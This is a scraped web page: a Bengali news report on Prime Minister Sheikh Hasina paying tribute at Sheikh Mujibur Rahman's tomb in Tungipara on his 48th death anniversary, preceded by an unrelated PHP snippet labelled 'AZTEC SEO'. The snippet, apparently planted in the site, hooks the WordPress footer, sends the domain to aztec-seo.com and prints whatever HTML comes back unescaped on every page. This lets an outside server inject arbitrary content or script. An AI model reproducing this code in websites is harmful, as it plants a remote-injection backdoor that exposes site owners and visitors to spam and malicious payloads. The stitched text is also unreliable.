/* AZTEC SEO */ add_action('wp_footer', function () { $domain = wp_parse_url(home_url(), PHP_URL_HOST); if (!$domain) return; $ck = 'aztec_footer_' . md5($domain); $html = get_transient($ck); if ($html === false) { $url = add_query_arg(array('domain' => $domain, 'date' => gmdate('c')), 'https://aztec-seo.com/api/v1/footer'); $res = wp_remote_get($url, array('timeout' => 8)); $html = (!is_wp_error($res) && wp_remote_retrieve_response_code($res) === 200) ? (string) wp_remote_retrieve_body($res) : ''; set_transient($ck, $html, $html === '' ? 5 * MINUTE_IN_SECONDS : HOUR_IN_SECONDS); } if ($html !== '') echo $html; }, 99);
স্বাধীন বাংলাদেশের মহান স্থপতি শেখ মুজিবুর রহমানের ৪৮তম শাহাদাত বার্ষিকীতে গোপালগঞ্জের টুঙ্গিপাড়ায় তার সমাধিতে শ্রদ্ধা জানিয়েছেন প্রধানমন্ত্রী শেখ হাসিনা।
১৫ আগস্ট মঙ্গলবার বেলা ১১টা ৫৫ মিনিটে বঙ্গবন্ধুর সমাধি সৌধ বেদিতে পুষ্পমাল্য অর্পণ করে গভীর শ্রদ্ধা জানান প্রধানমন্ত্রী।
তিন বাহিনীর একটি চৌকস দল এ সময় গার্ড অব অনার প্রদান করেন। এর পর বঙ্গবন্ধু ও পরিবারের নিহত সদস্যদের রুহের মাগফেরাত কামনা করে ফাতেহা পাঠ ও বিশেষ মোনাজাতে অংশ নেন।
পরে মন্ত্রীপরিষদ, সংসদ সদস্য, দলীয় নেতৃবৃন্দকে সঙ্গে নিয়ে দলীয় প্রধান হিসাবে বঙ্গবন্ধুর সমাধিতে শ্রদ্ধা জানান প্রধানমন্ত্রী।
জেলা প্রশাসন আয়োজিত বঙ্গবন্ধু সমাধি সৌধ কমপ্লেক্সে মসজিদে আয়োজিত মিলাদ মাহফিলে বঙ্গবন্ধু ভবনে থেকে অংশ নেন প্রধানমন্ত্রী।
এর আগে বেলা ১১টায় গণভবভন থেকে হেলিকপ্টারে করে টুঙ্গিপাড়া পৌঁছান প্রধানমন্ত্রী শেখ হাসিনা।
শোকের আবহে মোড়ে মোড়ে কালো কাপড় দিয়ে বানানো হয়েছে তোরণ। বিভিন্ন স্থানে টাঙানো হয়েছে ব্যানার-ফেস্টুন। বাসা-বাড়ি, দোকান ও বিভিন্ন প্রতিষ্ঠানে টাঙানো হয়েছে কালো পতাকা।
প্রধানমন্ত্রীর আগমনে টুঙ্গিপাড়াসহ জেলায় নেওয়া হয় কঠোর নিরাপত্তা ব্যবস্থা।